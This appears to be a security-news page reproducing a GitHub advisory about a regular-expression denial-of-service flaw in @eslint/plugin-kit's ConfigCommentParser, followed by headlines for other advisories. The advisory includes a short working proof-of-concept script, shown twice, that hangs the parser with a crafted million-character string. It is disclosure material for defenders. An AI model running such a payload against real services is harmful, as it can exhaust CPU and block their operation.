Security
Headlines

Headlines Latest CVEs

Headline

GHSA-xffm-g5w8-qvg7: @eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser

Summary

The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.

Details

The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].

PoC

const { ConfigCommentParser } = require("@eslint/plugin-kit");

const str = `${"A".repeat(1000000)}?: 1 B: 2`;

console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end")

// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`
// then the program will stuck forever with high CPU usage

Impact

This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

4 hours ago

#dos #nodejs #js #git #java

GitHub Advisory Database
GitHub Reviewed
GHSA-xffm-g5w8-qvg7

@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser

High severity GitHub Reviewed Published Jul 18, 2025 in eslint/rewrite • Updated Jul 18, 2025

Package

npm @eslint/plugin-kit (npm)

Affected versions

< 0.3.3

Summary

The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.

Details

The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].

PoC

const { ConfigCommentParser } = require(“@eslint/plugin-kit”);

const str = `${"A".repeat(1000000)}?: 1 B: 2`;

console.log(“start”) var parser = new ConfigCommentParser(); console.log(parser.parseJSONLikeConfig(str)); console.log(“end”)

// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js` // then the program will stuck forever with high CPU usage

Impact

This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.

References

GHSA-xffm-g5w8-qvg7
eslint/rewrite@b283f64

Published to the GitHub Advisory Database

Jul 18, 2025

Last updated

Jul 18, 2025

ghsa: Latest News

GHSA-xffm-g5w8-qvg7: @eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser

4 hours ago

GHSA-5662-cv6m-63wh: melange's world-writable permissions expose SBOM files to potential image tampering

4 hours ago

GHSA-x6ph-r535-3vjw: apko is vulnerable to attack through incorrect permissions in /etc/ld.so.cache and other files

4 hours ago

GHSA-fm79-3f68-h2fc: Wasmtime CLI is vulnerable to host panic through its fd_renumber function

5 hours ago

GHSA-6v2p-p543-phr9: golang.org/x/oauth2 Improper Validation of Syntactic Correctness of Input vulnerability

7 hours ago